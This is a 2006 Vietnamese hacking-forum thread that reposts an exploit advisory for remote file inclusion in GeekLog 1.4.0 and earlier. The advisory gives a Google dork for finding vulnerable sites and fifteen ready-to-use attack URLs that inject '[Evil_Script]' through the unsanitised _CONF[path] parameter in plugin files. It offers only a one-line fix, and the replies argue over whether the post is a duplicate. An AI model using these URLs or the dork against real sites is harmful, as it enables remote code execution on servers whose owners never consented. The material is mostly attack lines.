GeekLog <= 1.4.0 (_CONF[path]) Remote File Include Vulnerabilities

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thông tin new bugs và exploits

GeekLog <= 1.4.0 (_CONF[path]) Remote File Include Vulnerabilities

[Question] GeekLog = 1.4.0 (_CONF[path]) Remote File Include Vulnerabilities	01/07/2006 00:21:21 (+0700) \| #1 \| 2581

geniusboy
Member

Joined: 28/06/2006 13:24:11
Messages: 4
Location: VITINHCLUB
Offline

---------------------------------------------------------------------------
GeekLog <= 1.4.0 (_CONF[path]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Google d0rk: "powered by geeklog"

Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RoSecurityGroup.net :
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : GeekLog
version : latest version [ 1.4 ]
URL : http://www.geeklog.net/

------------------------------------------------------------------
Exploit:
~~~~~~~~

Variable $_CONF[path] not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.

were [path] on some cases => www.site.com/[path]/public_html/index.php

# http://www.site.com/[path]/plugins/links/functions.inc?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/polls/functions.inc?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=[Evil_Script]
#http://www.site.com/[path]/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/Import.Admin.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/spamx/LogView.Admin.class.php?_CONF[path]=[Evil_Script]
# http://www.site.com/[path]/plugins/staticpages/functions.inc?_CONF[path]=[Evil_Script]

---------------------------------------------------------------------------

Solution :
~~~~~~~~~~

declare variabel $_CONF[path]
---------------------------------------------------------------------------

[Question] GeekLog = 1.4.0 (_CONF[path]) Remote File Include Vulnerabilities	01/07/2006 00:24:32 (+0700) \| #2 \| 2583

BigballVN
Elite Member

Joined: 12/06/2005 07:25:21
Messages: 610
Offline

Bug này đc post rồi post chi nữa vậy pa. Spam ah???

[Question] GeekLog = 1.4.0 (_CONF[path]) Remote File Include Vulnerabilities	01/07/2006 00:26:30 (+0700) \| #3 \| 2585

geniusboy
Member

Joined: 28/06/2006 13:24:11
Messages: 4
Location: VITINHCLUB
Offline

Ai bảo là post rồi hả. Xem lại xem 2 cái tên nó giống hay khác. Hix hix

[Question] GeekLog = 1.4.0 (_CONF[path]) Remote File Include Vulnerabilities	01/07/2006 00:27:57 (+0700) \| #4 \| 2587

BigballVN
Elite Member

Joined: 12/06/2005 07:25:21
Messages: 610
Offline

/hvaonline/posts/list/681.html
Chứ cái này là gì vậy trời???

[Question] GeekLog = 1.4.0 (_CONF[path]) Remote File Include Vulnerabilities	01/07/2006 00:33:25 (+0700) \| #5 \| 2590

geniusboy
Member

Joined: 28/06/2006 13:24:11
Messages: 4
Location: VITINHCLUB
Offline

He he. Cùng 1 kiểu nhưng 2 loại. Post cho zui

Go to:

Users currently in here
1 Anonymous